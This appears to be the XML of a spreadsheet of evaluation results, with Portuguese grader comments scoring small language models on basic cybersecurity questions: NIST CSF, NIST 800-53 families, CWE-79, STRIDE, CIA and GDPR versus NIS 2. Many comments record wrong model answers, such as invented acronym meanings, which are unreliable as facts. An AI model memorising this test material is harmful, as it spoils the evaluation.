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_2/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="19" documentId="11_644D472AA3A5787AFEE9E25CD965851C59622686" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{5D3B509B-B09B-42BD-B632-31B52333E080}"/>
  <bookViews>
    <workbookView xWindow="-60" yWindow="-16320" windowWidth="29040" windowHeight="15720"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Q2" i="1" s="1"/>
  <c r="M5" i="1"/>
  <c r="L5" i="1"/>
  <c r="K5" i="1"/>
  <c r="J5" i="1" s="1"/>
  <c r="I5" i="1"/>
  <c r="Q5" i="1" s="1"/>
  <c r="AD28" i="15"/>
  <c r="AD44" i="15"/>
  <c r="Q19" i="1"/>
  <c r="Q25" i="1"/>
  <c r="M26" i="1"/>
  <c r="AE45" i="15" s="1"/>
  <c r="L26" i="1"/>
  <c r="AD45" i="15" s="1"/>
  <c r="K26" i="1"/>
  <c r="J26" i="1" s="1"/>
  <c r="I26" i="1"/>
  <c r="Q26" i="1" s="1"/>
  <c r="M25" i="1"/>
  <c r="AE44" i="15" s="1"/>
  <c r="L25" i="1"/>
  <c r="K25" i="1"/>
  <c r="J25" i="1" s="1"/>
  <c r="I25" i="1"/>
  <c r="M24" i="1"/>
  <c r="AE43" i="15" s="1"/>
  <c r="L24" i="1"/>
  <c r="AD43" i="15" s="1"/>
  <c r="K24" i="1"/>
  <c r="AC43" i="15" s="1"/>
  <c r="I24" i="1"/>
  <c r="Q24" i="1" s="1"/>
  <c r="M23" i="1"/>
  <c r="AE42" i="15" s="1"/>
  <c r="L23" i="1"/>
  <c r="AD42" i="15" s="1"/>
  <c r="K23" i="1"/>
  <c r="AC42" i="15" s="1"/>
  <c r="I23" i="1"/>
  <c r="Q23" i="1" s="1"/>
  <c r="M22" i="1"/>
  <c r="AE41" i="15" s="1"/>
  <c r="L22" i="1"/>
  <c r="AD41" i="15" s="1"/>
  <c r="K22" i="1"/>
  <c r="AC41" i="15" s="1"/>
  <c r="I22" i="1"/>
  <c r="Q22" i="1" s="1"/>
  <c r="M21" i="1"/>
  <c r="AE40" i="15" s="1"/>
  <c r="L21" i="1"/>
  <c r="AD40" i="15" s="1"/>
  <c r="K21" i="1"/>
  <c r="AC40" i="15" s="1"/>
  <c r="I21" i="1"/>
  <c r="Q21" i="1" s="1"/>
  <c r="M20" i="1"/>
  <c r="AE39" i="15" s="1"/>
  <c r="L20" i="1"/>
  <c r="AD39" i="15" s="1"/>
  <c r="K20" i="1"/>
  <c r="AC39" i="15" s="1"/>
  <c r="I20" i="1"/>
  <c r="Q20" i="1" s="1"/>
  <c r="M19" i="1"/>
  <c r="AE38" i="15" s="1"/>
  <c r="L19" i="1"/>
  <c r="AD38" i="15" s="1"/>
  <c r="K19" i="1"/>
  <c r="AC38" i="15" s="1"/>
  <c r="J19" i="1"/>
  <c r="I19" i="1"/>
  <c r="M18" i="1"/>
  <c r="AE37" i="15" s="1"/>
  <c r="L18" i="1"/>
  <c r="AD37" i="15" s="1"/>
  <c r="K18" i="1"/>
  <c r="J18" i="1" s="1"/>
  <c r="I18" i="1"/>
  <c r="Q18" i="1" s="1"/>
  <c r="M17" i="1"/>
  <c r="AE36" i="15" s="1"/>
  <c r="L17" i="1"/>
  <c r="AD36" i="15" s="1"/>
  <c r="K17" i="1"/>
  <c r="AC36" i="15" s="1"/>
  <c r="I17" i="1"/>
  <c r="Q17" i="1" s="1"/>
  <c r="M16" i="1"/>
  <c r="AE35" i="15" s="1"/>
  <c r="L16" i="1"/>
  <c r="AD35" i="15" s="1"/>
  <c r="K16" i="1"/>
  <c r="J16" i="1" s="1"/>
  <c r="I16" i="1"/>
  <c r="Q16" i="1" s="1"/>
  <c r="M15" i="1"/>
  <c r="AE34" i="15" s="1"/>
  <c r="L15" i="1"/>
  <c r="AD34" i="15" s="1"/>
  <c r="K15" i="1"/>
  <c r="AC34" i="15" s="1"/>
  <c r="I15" i="1"/>
  <c r="Q15" i="1" s="1"/>
  <c r="M14" i="1"/>
  <c r="AE33" i="15" s="1"/>
  <c r="L14" i="1"/>
  <c r="AD33" i="15" s="1"/>
  <c r="K14" i="1"/>
  <c r="AC33" i="15" s="1"/>
  <c r="I14" i="1"/>
  <c r="Q14" i="1" s="1"/>
  <c r="M13" i="1"/>
  <c r="AE32" i="15" s="1"/>
  <c r="L13" i="1"/>
  <c r="AD32" i="15" s="1"/>
  <c r="K13" i="1"/>
  <c r="AC32" i="15" s="1"/>
  <c r="I13" i="1"/>
  <c r="Q13" i="1" s="1"/>
  <c r="M12" i="1"/>
  <c r="AE31" i="15" s="1"/>
  <c r="L12" i="1"/>
  <c r="AD31" i="15" s="1"/>
  <c r="K12" i="1"/>
  <c r="AC31" i="15" s="1"/>
  <c r="J12" i="1"/>
  <c r="I12" i="1"/>
  <c r="Q12" i="1" s="1"/>
  <c r="M11" i="1"/>
  <c r="AE30" i="15" s="1"/>
  <c r="L11" i="1"/>
  <c r="AD30" i="15" s="1"/>
  <c r="K11" i="1"/>
  <c r="J11" i="1" s="1"/>
  <c r="I11" i="1"/>
  <c r="Q11" i="1" s="1"/>
  <c r="M10" i="1"/>
  <c r="AE29" i="15" s="1"/>
  <c r="L10" i="1"/>
  <c r="AD29" i="15" s="1"/>
  <c r="K10" i="1"/>
  <c r="AC29" i="15" s="1"/>
  <c r="I10" i="1"/>
  <c r="Q10" i="1" s="1"/>
  <c r="M9" i="1"/>
  <c r="AE28" i="15" s="1"/>
  <c r="L9" i="1"/>
  <c r="K9" i="1"/>
  <c r="AC28" i="15" s="1"/>
  <c r="I9" i="1"/>
  <c r="Q9" i="1" s="1"/>
  <c r="M8" i="1"/>
  <c r="AE27" i="15" s="1"/>
  <c r="L8" i="1"/>
  <c r="AD27" i="15" s="1"/>
  <c r="K8" i="1"/>
  <c r="AC27" i="15" s="1"/>
  <c r="I8" i="1"/>
  <c r="Q8" i="1" s="1"/>
  <c r="M7" i="1"/>
  <c r="AE26" i="15" s="1"/>
  <c r="L7" i="1"/>
  <c r="AD26" i="15" s="1"/>
  <c r="K7" i="1"/>
  <c r="AC26" i="15" s="1"/>
  <c r="I7" i="1"/>
  <c r="Q7" i="1" s="1"/>
  <c r="M6" i="1"/>
  <c r="AE25" i="15" s="1"/>
  <c r="L6" i="1"/>
  <c r="AD25" i="15" s="1"/>
  <c r="K6" i="1"/>
  <c r="J6" i="1" s="1"/>
  <c r="I6" i="1"/>
  <c r="Q6" i="1" s="1"/>
  <c r="M4" i="1"/>
  <c r="AE24" i="15" s="1"/>
  <c r="L4" i="1"/>
  <c r="AD24" i="15" s="1"/>
  <c r="K4" i="1"/>
  <c r="AC24" i="15" s="1"/>
  <c r="I4" i="1"/>
  <c r="Q4" i="1" s="1"/>
  <c r="M3" i="1"/>
  <c r="AE23" i="15" s="1"/>
  <c r="L3" i="1"/>
  <c r="AD23" i="15" s="1"/>
  <c r="K3" i="1"/>
  <c r="AC23" i="15" s="1"/>
  <c r="I3" i="1"/>
  <c r="Q3" i="1" s="1"/>
  <c r="M2" i="1"/>
  <c r="AE22" i="15" s="1"/>
  <c r="L2" i="1"/>
  <c r="AD22" i="15" s="1"/>
  <c r="K2" i="1"/>
  <c r="AC22" i="15" s="1"/>
  <c r="J23" i="1" l="1"/>
  <c r="J13" i="1"/>
  <c r="J17" i="1"/>
  <c r="J22" i="1"/>
  <c r="J20" i="1"/>
  <c r="AC37" i="15"/>
  <c r="AC35" i="15"/>
  <c r="J15" i="1"/>
  <c r="J14" i="1"/>
  <c r="AC30" i="15"/>
  <c r="AC45" i="15"/>
  <c r="J10" i="1"/>
  <c r="J9" i="1"/>
  <c r="J8" i="1"/>
  <c r="AC44" i="15"/>
  <c r="J21" i="1"/>
  <c r="J7" i="1"/>
  <c r="AC25" i="15"/>
  <c r="J4" i="1"/>
  <c r="J3" i="1"/>
  <c r="J2" i="1"/>
  <c r="R2" i="1" a="1"/>
  <c r="R2" i="1" s="1"/>
  <c r="J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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1460" uniqueCount="378">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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O modelo forneceu uma lista de cinco atividades gerais de segurança, mas estas não são as cinco funções principais do NIST CSF (Identify, Protect, Detect, Respond, Recover). A resposta está totalmente incorreta.</t>
  </si>
  <si>
    <t>A resposta está incorreta e confusa. A família de controlos correta é 'AU - Audit and Accountability'. A resposta do modelo refere-se a 'Functional Requirement 2', o que não é a forma como as famílias de controlo são identificadas.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. CWE-79 refere-se a 'Cross-site Scripting (XSS)'. A resposta do modelo inventa o termo 'Criteria for Websitewebsites' e descreve níveis de vulnerabilidade genéricos sem identificar corretamente a CWE-79.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo inventou um significado para o acrónimo STRIDE (Situation, Target, Resource, Input, and Decay). O significado correto é Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege.</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</si>
  <si>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</si>
  <si>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A resposta está completamente errada. Embora os termos 'Control', 'Access' e 'Integrity' sejam relevantes para a segurança, eles não correspondem ao acrónimo CIA (Confidentiality, Integrity, Availability). O modelo inventou um significado para a sigla.</t>
  </si>
  <si>
    <t>A resposta define corretamente um requisito de segurança como uma declaração precisa que descreve o que deve ser feito para proteger os ativos. A explicação é concisa e precisa.</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</si>
  <si>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</si>
  <si>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A resposta está incorreta. A família de controlos correta é 'AU - Audit and Accountability'. O modelo sugeriu 'Information Assurance Controls', que é uma categoria mais ampla e não o nome específico da família de controlos.</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. O modelo confunde-o com validação de entrada e tratamento de erros num contexto de autenticação, o que não corresponde à definição real.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo inventou um significado para STRIDE (System, Threats, Risks, Impact, Defenses, Environment), que não corresponde ao acrónimo correto e amplamente conhecido.</t>
  </si>
  <si>
    <t>A resposta diferencia corretamente o GDPR (proteção de dados pessoais) do NIS 2 (segurança de sistemas de TI no setor público/crítico). A distinção é clara e precisa.</t>
  </si>
  <si>
    <t>O modelo identificou corretamente os três componentes da tríade CIA: Confidencialidade, Integridade e Disponibilidade.</t>
  </si>
  <si>
    <t>Resposta correta e concisa. Define um requisito de segurança como uma condição específica e mensurável para proteção.</t>
  </si>
  <si>
    <t>O modelo identificou corretamente as cinco funções principais do NIST CSF e forneceu uma descrição de uma palavra para cada, que está correta.</t>
  </si>
  <si>
    <t>A resposta está incorreta. 'Control 5 – Security and Privacy Controls' não é a família de controlo para auditoria e responsabilidade no NIST 800-53. A família correta é 'AU'.</t>
  </si>
  <si>
    <t>A resposta está correta. O modelo identifica corretamente CWE-79 como 'Cross-Site Scripting (XSS)' e fornece uma boa explicação do que a vulnerabilidade representa.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo inventou um significado para o acrónimo STRIDE que não tem qualquer relação com o modelo de ameaças real.</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</si>
  <si>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</si>
  <si>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A resposta identifica corretamente os três componentes da tríade CIA e fornece uma breve e precisa descrição para cada um.</t>
  </si>
  <si>
    <t>Resposta correta. Define bem um requisito de segurança e a questão que ele responde.</t>
  </si>
  <si>
    <t>O modelo identificou e descreveu corretamente as cinco funções principais do NIST CSF.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlos correta é 'AU - Audit and Accountability'. 'AC-2' é um controlo específico dentro da família 'AC - Access Control', não a família para auditoria.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo confunde CWE-79 ('Cross-site Scripting') com uma categoria mais ampla de 'Improper Input Validation'. Embora o XSS seja um tipo de validação de entrada inadequada, CWE-79 é especificamente sobre XSS.</t>
  </si>
  <si>
    <t>A resposta está correta. Distingue bem o foco do GDPR (proteção de dados mais ampla) do NIS 2 (gestão de risco de cibersegurança operacional para infraestruturas críticas).</t>
  </si>
  <si>
    <t>A resposta está correta, identificando os três componentes da tríade CIA.</t>
  </si>
  <si>
    <t>A resposta é correta, concisa e menciona os três pilares da tríade CIA no contexto de um requisito de segurança.</t>
  </si>
  <si>
    <t>O modelo identificou corretamente as cinco funções principais do NIST CSF e forneceu a descrição oficial para cada uma.</t>
  </si>
  <si>
    <t>A resposta está incorreta. Embora nomeie a família correta ('Audit and Accountability'), ela inventa controlos que não existem ou os descreve de forma errada (ex: AU-2 não é Autenticação, é 'Audit Events'). O identificador da família é 'AU'.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica CWE-79 como 'Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')' e descreve-o com precisão.</t>
  </si>
  <si>
    <t>A resposta está incorreta. Lista sete componentes para o acrónimo de seis letras e usa termos errados como 'Invasion of Privacy' e 'Replication'. O 'R' em STRIDE é para 'Repudiation'.</t>
  </si>
  <si>
    <t>A resposta distingue corretamente os focos do NIS 2 (segurança de redes e infraestruturas) e do GDPR (proteção de dados pessoais e privacidade).</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica os três componentes da tríade CIA e fornece uma excelente e detalhada explicação para cada um.</t>
  </si>
  <si>
    <t>A resposta está correta e adiciona o útil enquadramento SMART (Specific, Measurable, Achievable, Relevant, and Time-bound) para definir os requisitos.</t>
  </si>
  <si>
    <t>A resposta identifica corretamente as cinco funções principais do NIST CSF.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlos correta é 'AU - Audit and Accountability'. O modelo usa o identificador 'AC', que corresponde a 'Access Control'.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica os seis componentes do acrónimo STRIDE com precisão.</t>
  </si>
  <si>
    <t>A resposta diferencia corretamente o NIS 2 (cibersegurança de sistemas e redes em setores críticos) do GDPR (proteção de dados pessoais e privacidade), abordando o propósito, âmbito e requisitos chave.</t>
  </si>
  <si>
    <t>A resposta é correta, detalhada e inclui exemplos práticos que ajudam a clarificar o conceito.</t>
  </si>
  <si>
    <t>O modelo identificou e descreveu corretamente as cinco funções principais do NIST CSF de forma detalhada e precisa.</t>
  </si>
  <si>
    <t>A resposta está incorreta. Identifica a família 'Access Control' (AC) como responsável por auditoria, o que não é verdade. A família correta é 'AU - Audit and Accountability'.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica CWE-79 como 'Cross-Site Scripting (XSS)' e descreve-o com precisão, mencionando os tipos Stored e Reflected.</t>
  </si>
  <si>
    <t>A resposta é excelente, detalhada e precisa. Explica claramente as diferenças de propósito, âmbito, tipo de proteção, penalidades e direitos individuais entre o NIS 2 e o GDPR.</t>
  </si>
  <si>
    <t>A resposta está correta e descreve com precisão os três componentes da tríade CIA.</t>
  </si>
  <si>
    <t>A resposta é correta, definindo um requisito de segurança e listando exemplos de aspetos que pode cobrir.</t>
  </si>
  <si>
    <t>A resposta distingue corretamente o NIS 2 e o GDPR com base no âmbito (cibersegurança vs. proteção de dados) e propósito, fornecendo uma explicação clara.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica e descreve com precisão os três componentes da tríade CIA.</t>
  </si>
  <si>
    <t>A resposta está correta. Define um requisito de segurança como um conjunto de regras ou diretrizes para proteção e fornece exemplos relevantes. A persona é amigável, mas a informação é precisa.</t>
  </si>
  <si>
    <t>A resposta está correta. O modelo identifica e descreve corretamente as cinco funções principais do NIST CSF, mantendo uma persona amigável.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo identifica a família como 'Family 14: Audit and Accountability'. A família correta é 'AU - Audit and Accountability'. O NIST 800-53 não usa numeração para as famílias de controlo.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo descreve erradamente a CWE-79 como estando relacionada com o uso de funções ou bibliotecas obsoletas, o que corresponde à CWE-477. CWE-79 é 'Cross-site Scripting (XSS)'.</t>
  </si>
  <si>
    <t>A resposta está correta. O modelo identifica os seis componentes do acrónimo STRIDE e fornece uma descrição detalhada e precisa para cada um, usando uma persona amigável.</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</si>
  <si>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</si>
  <si>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A resposta está correta. Identifica e descreve com precisão os três componentes da tríade CIA (Confidentiality, Integrity, Availability).</t>
  </si>
  <si>
    <t>A resposta é correta, bem estruturada e fornece uma lista de exemplos relevantes para os aspetos que um requisito de segurança pode cobrir.</t>
  </si>
  <si>
    <t>A resposta está correta. A família de controlo para auditoria e responsabilidade é 'AU - Audit and Accountability'.</t>
  </si>
  <si>
    <t>A resposta identifica corretamente cinco dos seis componentes do STRIDE, mas está a faltar 'Elevation of Privilege'.</t>
  </si>
  <si>
    <t>A resposta distingue corretamente o âmbito e os requisitos chave do NIS 2 e do GDPR.</t>
  </si>
  <si>
    <t>A resposta está correta, identificando e descrevendo com precisão os três componentes da tríade CIA.</t>
  </si>
  <si>
    <t>A resposta é correta e bem estruturada, definindo o conceito, listando os tipos e dando exemplos claros.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo inventou uma lista de funções que não correspondem às cinco funções principais do NIST CSF.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo refere-se ao 'CAPEC', que é um catálogo de padrões de ataque, não uma família de controlos do NIST 800-53. Nenhum dos identificadores fornecidos está correto.</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. O modelo descreve uma vulnerabilidade de 'Information Exposure', que corresponde a uma CWE diferente.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo inventa um significado para STRIDE (Six Common Web Application Weaknesses) e lista categorias que não correspondem ao acrónimo real.</t>
  </si>
  <si>
    <t>A resposta é muito concisa, mas a distinção fundamental está correta: NIS 2 foca-se na segurança de sistemas de informação, enquanto o GDPR se foca na proteção de dados pessoais.</t>
  </si>
  <si>
    <t>A resposta está correta e identifica com precisão os três componentes da tríade CIA.</t>
  </si>
  <si>
    <t>A resposta é correta, concisa e usa o enquadramento SMART para descrever um requisito de segurança.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlo correta é 'AU - Audit and Accountability'. O modelo usa o identificador 'AUD', que não é o identificador padrão de duas letras.</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. A resposta do modelo descreve 'SQL Injection' (que é outra CWE) e confunde os conceitos.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo identifica 'R' como 'Denial of Service' e 'D' como 'Deception', o que está errado. O 'I' de STRIDE também está em falta.</t>
  </si>
  <si>
    <t>A resposta está correta, distinguindo claramente o foco do NIS 2 (infraestruturas críticas) e do GDPR (dados pessoais).</t>
  </si>
  <si>
    <t>A resposta é correta, definindo um requisito de segurança e mencionando o seu propósito de garantir a confidencialidade, integridade e disponibilidade.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo identifica a família como 'Family 14 (AU)', o que está errado. O identificador correto é 'AU', e não existe uma 'Family 14' numerada desta forma.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo confunde CWE-79 (Cross-site Scripting) com 'SQL Injection'. Embora ambas sejam vulnerabilidades de injeção, são distintas e têm CWEs diferentes.</t>
  </si>
  <si>
    <t>A resposta distingue corretamente o foco do NIS 2 (cibersegurança de infraestruturas críticas) do GDPR (proteção de dados pessoais).</t>
  </si>
  <si>
    <t>A resposta é excelente. Define o conceito, lista os atributos que protege e fornece dois exemplos práticos e detalhados que ilustram a aplicação de um requisito de segurança.</t>
  </si>
  <si>
    <t>O modelo identificou corretamente as cinco funções principais do NIST CSF e descreveu o fluxo entre elas.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</si>
  <si>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</si>
  <si>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A resposta está completamente errada. O modelo confunde CWE-79 com 'CVE-2016-3458' (uma CVE específica, não uma CWE), e descreve uma vulnerabilidade de 'Deserialization of Untrusted Data' (CWE-502), não 'Cross-site Scripting'.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica os seis componentes do acrónimo STRIDE e fornece uma descrição precisa para cada um.</t>
  </si>
  <si>
    <t>A resposta está incorreta e confusa. Confunde o NIS 2 com o 'NIST SP on Digital Identity Guidelines 2'. A comparação do âmbito geográfico e das penalidades é feita entre o GDPR e um documento NIST, não entre o GDPR e o NIS 2.</t>
  </si>
  <si>
    <t>A resposta está correta, identificando os três componentes da tríade CIA e fornecendo uma boa explicação.</t>
  </si>
  <si>
    <t>A resposta está correta, embora seja extremamente verbosa e difícil de ler devido à falta de pontuação e formatação. O conteúdo em si é preciso.</t>
  </si>
  <si>
    <t>A resposta está incompleta. O modelo lista apenas quatro das cinco funções, faltando a função 'Recover'. A numeração também está errada (salta do 2 para o 4).</t>
  </si>
  <si>
    <t>A resposta identifica corretamente a família de controlo 'Audit and Accountability (AU)' e descreve com precisão o seu propósito.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo confunde CWE-79 (Cross-site Scripting) com 'Buffer Overflow' (por exemplo, CWE-120).</t>
  </si>
  <si>
    <t>A resposta está incompleta e mal formatada. Identifica apenas 'Spoofing identity' e 'Tampering'. A segunda linha é uma lista confusa de termos em vez dos restantes componentes do STRIDE.</t>
  </si>
  <si>
    <t>A resposta é muito concisa, mas captura a essência da diferença: âmbito de proteção (direitos do titular vs. infraestrutura crítica) e cobertura geográfica.</t>
  </si>
  <si>
    <t>A resposta está correta e concisa, identificando os três componentes.</t>
  </si>
  <si>
    <t>A resposta está correta. Define um requisito de segurança de forma precisa, menciona a tríade CIA, o seu papel no ciclo de vida de desenvolvimento e fornece um exemplo claro.</t>
  </si>
  <si>
    <t>A resposta está correta. O modelo não só identifica as cinco funções, mas também descreve o seu propósito e fornece exemplos de tarefas ou controlos para cada uma.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. 'ATPO300' não é um controlo ou família de controlo do NIST, parece ser uma alucinação completa. A família correta é 'AU - Audit and Accountability'.</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. O modelo descreve uma vulnerabilidade de 'buffer overflow', que corresponde a uma CWE diferente (por exemplo, CWE-120).</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo identifica os componentes de STRIDE como Snooping, Tampering, Replication, Information Disclosure, Denial of Service, e Elevation of Privilege. O 'R' correto é para 'Repudiation', não 'Replication'. O 'S' correto é 'Spoofing', não 'Snooping'.</t>
  </si>
  <si>
    <t>A resposta está correta e bem detalhada, diferenciando o GDPR (privacidade de dados) do NIS 2 (resiliência cibernética de setores críticos) e abordando o âmbito e as penalidades.</t>
  </si>
  <si>
    <t>A resposta está correta, identificando e descrevendo com precisão cada um dos três componentes da tríade CIA.</t>
  </si>
  <si>
    <t>A resposta é extremamente concisa, mas tecnicamente correta.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A lista de funções (Protection, Detection, Response, Recovery, Mitigation) não corresponde às cinco funções principais do NIST CSF (Identify, Protect, Detect, Respond, Recover).</t>
  </si>
  <si>
    <t>A resposta é genérica e não responde à pergunta. Descreve o propósito do NIST 800-53 em vez de identificar a família de controlo específica para auditoria e responsabilidade.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo identifica erradamente CWE-79 como 'privilege escalation', quando na realidade é 'Cross-site Scripting (XSS)'.</t>
  </si>
  <si>
    <t>A resposta está incorreta. Confunde o NIS 2 com o 'National Institute of Standards and Technology' e descreve erradamente o seu âmbito como sendo para países não-UE, o que é falso.</t>
  </si>
  <si>
    <t>A resposta está correta, definindo um requisito de segurança e fornecendo exemplos de regulamentos e padrões relevantes.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlo correta é 'AU - Audit and Accountability'. O modelo identifica erradamente a 'Security Engineering' (cujo identificador é 'SE', não 'E') como responsável.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo confunde CWE-79 (Cross-site Scripting) com 'SQL Injection' (por exemplo, CWE-89).</t>
  </si>
  <si>
    <t>A resposta está quase correta, mas falta um componente. O acrónimo STRIDE tem seis elementos. A resposta lista apenas cinco, faltando 'Elevation of Privilege'.</t>
  </si>
  <si>
    <t>A resposta é correta, embora um pouco genérica. Captura a essência da diferença entre os dois regulamentos.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlos correta é 'AU - Audit and Accountability'. O modelo identifica 'Access Control' (AC) como responsável.</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. O modelo descreve uma vulnerabilidade de autorização de software, que não corresponde.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A lista fornecida não corresponde ao acrónimo STRIDE. 'Spoofing' é correto para S, mas foi colocado entre parênteses. 'Theft' e 'Interruption' estão errados.</t>
  </si>
  <si>
    <t>A resposta é muito concisa, mas a distinção fundamental está correta: NIS 2 foca-se na segurança de infraestruturas, enquanto o GDPR regula dados pessoais.</t>
  </si>
  <si>
    <t>A resposta é correta, definindo um requisito de segurança e o seu propósito de proteger contra uma gama de ameaças.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlo correta é 'AU - Audit and Accountability'. O modelo identifica 'SA - System and Services Acquisition' como responsável.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica CWE-79 como 'Cross-Site Scripting (XSS)' e descreve-o com precisão.</t>
  </si>
  <si>
    <t>O modelo não conseguiu gerar uma resposta devido a um erro técnico.</t>
  </si>
  <si>
    <t>A resposta é concisa e correta, distinguindo o foco do GDPR (dados pessoais) do NIS 2 (infraestruturas críticas).</t>
  </si>
  <si>
    <t>A resposta está correta, definindo um requisito de segurança como uma regra ou diretriz e fornecendo exemplos relevantes.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlo correta é 'AU - Audit and Accountability'. O modelo identifica erradamente 'Information Control (IC)' como responsável.</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. O modelo descreve uma vulnerabilidade genérica de 'misuse of untrusted data', o que é demasiado vago e não identifica a vulnerabilidade específica.</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo inventou um significado para o acrónimo STRIDE (Strategy, Threat, Risk, Impact, and Detection) que não tem qualquer relação com o modelo de ameaças real.</t>
  </si>
  <si>
    <t>A resposta é concisa e correta, distinguindo o foco do NIS 2 (segurança da informação) do GDPR (proteção de dados e direitos do utilizador).</t>
  </si>
  <si>
    <t>A resposta está completamente errada. O modelo confunde a tríade CIA com a agência de inteligência dos EUA e inventa um significado para a sigla (Cybersecurity, Infrastructure, and Intelligence).</t>
  </si>
  <si>
    <t>A resposta está correta, definindo um requisito de segurança, o seu propósito e fornecendo exemplos claros.</t>
  </si>
  <si>
    <t>A resposta está incorreta. A família de controlo correta é 'AU - Audit and Accountability'. O modelo identifica erradamente 'Data Security' como responsável.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo descreve 'Improper Handling of Input' (uma categoria ampla), mas falha em identificar que CWE-79 é especificamente 'Cross-site Scripting (XSS)'.</t>
  </si>
  <si>
    <t>A resposta está incorreta. Os componentes do STRIDE são Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. O modelo inclui 'Replay' e 'Injection', que não fazem parte do acrónimo STRIDE.</t>
  </si>
  <si>
    <t>A resposta está correta e bem estruturada, diferenciando o GDPR (proteção de dados) do NIS 2 (cibersegurança) e detalhando as diferenças de âmbito, foco e aplicação.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo inventou um significado para o acrónimo CIA (Charter, Integrity, Access), que não corresponde ao padrão (Confidentiality, Integrity, Availability).</t>
  </si>
  <si>
    <t>A resposta é correta, concisa e precisa, explicando o que é um requisito de segurança e a sua derivação.</t>
  </si>
  <si>
    <t>O modelo não conseguiu gerar uma resposta devido a um erro técnico (timeout).</t>
  </si>
  <si>
    <t>A resposta está incorreta. CWE-79 é 'Cross-site Scripting (XSS)'. O modelo descreve uma vulnerabilidade de controlo de acesso baseada no tempo, que não corresponde.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo inclui 'Equipment failure' como o 'E' de STRIDE, o que está errado. O 'E' correto é para 'Elevation of Privilege'.</t>
  </si>
  <si>
    <t>A resposta está correta, distinguindo claramente o foco do NIS 2 (cibersegurança de infraestruturas) do GDPR (proteção de dados).</t>
  </si>
  <si>
    <t>A resposta está correta, definindo um requisito de segurança de forma clara e mencionando a tríade CIA e exemplos de controlos.</t>
  </si>
  <si>
    <t>A resposta está correta. Identifica a família 'Audit and Accountability' e descreve corretamente o seu propósito.</t>
  </si>
  <si>
    <t>A resposta está incorreta. O modelo inclui 'Trust Management' como o 'T' de STRIDE, o que está errado. O 'T' correto é para 'Tampering'.</t>
  </si>
  <si>
    <t>A resposta está correta e bem estruturada, diferenciando claramente o foco, âmbito e requisitos do GDPR e do NIS 2.</t>
  </si>
  <si>
    <t>Question</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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gemma3n:e2b</t>
  </si>
  <si>
    <t>Analyze the following statement: 'The system must enforce multi-factor authentication (MFA) for all administrative access.' In the context of cybersecurity, what type of statement is this and what is its primary purpose?</t>
  </si>
  <si>
